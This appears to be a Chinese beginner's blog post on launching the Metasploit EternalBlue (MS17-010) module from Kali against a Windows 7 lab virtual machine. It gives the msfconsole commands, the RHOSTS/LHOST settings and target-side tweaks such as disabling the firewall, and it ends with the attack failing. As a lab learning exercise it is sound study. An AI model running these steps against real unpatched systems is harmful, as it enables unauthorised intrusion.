1.什么是Metaspolit?
msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。
2.体验Kali渗透工具——metasploit
metasploit攻击windows操作系统
msfconsole:启动metasploit命令行
启动metasploit前需要做:
- 打开kali终端
- 使用sudo su 命令,并输入kali的密码kali,切换至root用户
- 使用msfdb init命令 初始化metasploit数据库(*可选)
打开kali终端,输入sudo su,输入密码kali后可以看到如下图所示界面:
输入msfconsole,即可打开msf6版本(也可以是mfs5版本),加载中如下图所示:
加载完成打开msf后界面如下图所示:
3.“永恒之蓝”漏洞
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
metasploit攻击永恒之蓝全流程:
1.使用模块
use exploit/windows/smb/ms17_010_eternalblue
2.设置必选项
→查看必选项[*required为yes的就是必选项]
show options
3.1查找模块
查找模块 search 模块名,例如此处永恒之蓝即ms17_010
3.2使用模块
如果要使用上述呈现出的四个模块中的一个模块,可以通过use 模块号 或者use 模块名,如下图所示:
3.3查看必选项
接着在设置必选项之前先查看必选项,使用命令show options 或者直接输入options,如下图所示:
选择一个操作系统(2017年之前的版本一般都有永恒之蓝漏洞),建议选择Windows7 64位操作系统,这里就省略VMware Workstation安装Windows7的步骤了。
这里提供一个操作系统下载网址:msdn.itellyou.cn
此处安装的是windows7 64x虚拟机,使之与kali虚拟机在同一网段中,即两台虚拟机能够互相ping通。
在windows7虚拟机中查看IP地址,使用ipconfig命令,如下图所示:
可以得知该windows虚拟机的IP地址为192.168.1.129,ping 192.168.1.136,ping通如下所示:
在kali机终端也执行以下命令ping 192.168.1.129(windows7 ip),ping通如下图所示:
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。如下图所示:
3.4设置必选项
3.4.1 设置RHOSTS
输入命令set RHOSTS 192.168.1.129 (Windows7 IP),如下图所示:
3.4.2 设置Payload options
输入命令 set LHOST 192.168.1.136 (kali机IP),如下图所示:
LPORT可以随意修改,只要端口没有被占用均可。
设置完成后再次通过show options查看必选项,如下图所示:
3.5 run实现攻击模块
(Windows7靶机)
Exploit completed, but no session was created.此时显示攻击完成,但未创建会话。
又遇到问题啦
此时说明攻击者没有获取到目标系统的远程访问权限。
开启方法:将远程连接开启,win7下右击我的电脑选择属性,属性窗口选择左边的远程设置,远程协议勾选,远程桌面选择允许任意版本远程桌面的计算机连接,如下图所示:
学到这报一丝,还是没能成功,渗透攻击有可能成功也有可能失败,漏洞在不断修复之中,对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~
求大佬带带!呜呜~小邹加油呀